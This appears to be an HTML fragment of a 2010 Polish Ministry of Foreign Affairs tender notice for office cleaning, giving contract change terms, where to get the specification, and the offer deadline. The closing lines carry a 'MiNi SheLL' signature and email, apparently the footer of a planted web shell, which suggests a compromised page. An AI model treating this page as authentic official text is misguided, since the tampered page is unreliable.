<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakres przedmiotu umowy obejmuje 9483 m2 powierzchni do sprzątania. 
ZAMAWIAJĄCY zastrzega sobie możliwość zmniejszenia  powierzchni przeznaczonej do sprzątania  w zależności od nieprzewidzianych przez ZAMAWIAJĄCEGO potrzeb wynikłych w  trakcie ich realizacji  w okresie związania umową, za uprzednim tygodniowym pisemnym powiadomieniem,
ZAMAWIAJĄCY zastrzega sobie możliwość zwiększenia ilości sprzątanej powierzchni za zgodą Wykonawcy w ramach ewentualnego zamówienia uzupełniającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.msz.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.msz.gov.pl   zakładka aktualności Zarządu Obsługi.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2010 godzina 11:00, miejsce: Oferty należy składać w dni robocze (bez sobót i niedziel) w godz. 9.00  - 14.00 nie później niż do dnia 09.03.2010r. do godz.11,00 na Dzienniku Podawczym w siedzibie zamawiającego przy Al. Szucha 23,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com